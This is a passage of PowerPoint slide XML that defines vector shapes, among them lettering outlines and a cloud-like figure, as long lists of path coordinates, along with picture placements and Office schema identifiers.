                  <a:lnTo>
                    <a:pt x="362054" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335415" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316071" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335415" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383186" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360753" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383186" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462536" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429047" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433579" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439715" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434818" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428621" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394953" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394908" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396963" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405900" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406192" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411105" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420330" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422870" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425817" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423805" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421204" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420107" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419172" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418197" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417587" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417100" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416978" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417567" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439431" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437460" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432659" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432365" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430754" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427605" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422383" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417181" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406777" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403018" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402713" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404501" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407427" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415335" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415113" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419457" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460035" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454508" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449727" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443647" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436603" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437440" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427605" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507278" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485373" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485373" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551046" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529121" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529121" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551046" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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E6CE8CBD-14AB-98C2-F64C-5A2E1F77F085}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5352201" y="3008351"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285240" h="821689">
                  <a:moveTo>
                    <a:pt x="538565" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477538" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456178" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447024" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436344" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389048" y="41003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350906" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344803" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338701" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332598" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328021" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323444" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317341" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314290" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308187" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305136" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303610" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="195903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291405" y="224757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280725" y="226276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271571" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260891" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253263" y="236906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244108" y="242981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236480" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212069" y="277909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198338" y="326505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="332580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="341692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189184" y="338654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176978" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164773" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="346247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54924" y="367508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25936" y="397881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10679" y="534558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33564" y="569486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67129" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79335" y="605933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="610489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106797" y="616564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122054" y="619601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163247" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="634787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="643899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="653011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178504" y="662123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180030" y="669716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186133" y="687940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190710" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195287" y="704644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224275" y="741092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254788" y="766908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289879" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329547" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363112" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373791" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384471" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396677" y="809430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408882" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421087" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445498" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457704" y="801837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479063" y="795762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491269" y="792725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500423" y="788169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511103" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520257" y="777539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529411" y="771464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540091" y="765390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547719" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556873" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564501" y="745648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570604" y="753241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="578233" y="762353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585861" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595015" y="776020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604169" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="789688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624003" y="794244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636208" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648414" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="660619" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674350" y="812467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701813" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715544" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729275" y="820061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744532" y="821579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="818542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834547" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880317" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="903203" y="768427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913882" y="759315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935242" y="727424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942870" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950499" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956601" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982538" y="706163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991692" y="704645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="703126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011526" y="700089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020680" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="686421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="678828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049668" y="672753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055771" y="666679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="659086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="649974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067976" y="642381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="633269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="624157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="615045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="602896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="592266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1080182" y="593784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092387" y="595303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1103067" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="589229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="571005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1255635" y="531521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263263" y="517853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="505704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1276994" y="492036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="461664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284623" y="446477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283097" y="431291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270892" y="388769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244955" y="350803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1209864" y="323468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196133" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180877" y="308282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165620" y="303726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148837" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115272" y="296133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1104592" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1093913" y="297651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083233" y="299170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="302207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1072553" y="262723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071027" y="250574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069502" y="239943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1066450" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063399" y="220201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060348" y="209571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051194" y="188310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042040" y="170086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035937" y="160974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029834" y="153381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023731" y="144270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1016103" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1010000" y="129083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002372" y="121490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994743" y="115416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987115" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968807" y="95673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="930665" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868112" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857432" y="63782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837598" y="65301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819290" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800982" y="72894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782674" y="77450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749109" y="92636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735378" y="103266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720121" y="113897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704864" y="89599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695710" y="78968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686556" y="66819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665196" y="48596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652991" y="39484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639260" y="30372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625529" y="24298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="18223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598066" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584335" y="7593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569078" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538565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BEF0DF44-2848-0F6C-9175-D8104B276C7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2714" y="3028093"/>
              <a:ext cx="1209864" cy="754759"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0B00EC-2C4E-C4C1-537D-1837F8824F8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3046" y="2999607"/>
              <a:ext cx="1302972" cy="839469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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0E88A198-8863-40DE-91F5-5A2A9AFA48DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7058986" y="3449270"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="638991" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340694" y="477833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="370472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979686" y="128531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638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3D36D99B-7126-8D2D-D260-C0DE60849ACB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7401195" y="3576289"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635963" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99937" y="332668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319495" y="294865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537540" y="257062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610221" y="244965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629906" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638991" y="243453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635963" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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3" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387251EC-1F74-589A-F9C3-83B2129D98A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8986" y="3450782"/>
              <a:ext cx="970601" cy="476321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57EA9A72-A44B-0EC4-BBF6-E0771D15C6F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50658" y="2919097"/>
              <a:ext cx="1400623" cy="1160247"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64741AF6-3BD2-3867-4238-B8A8B40B431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49650" y="3053092"/>
              <a:ext cx="443660" cy="491442"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
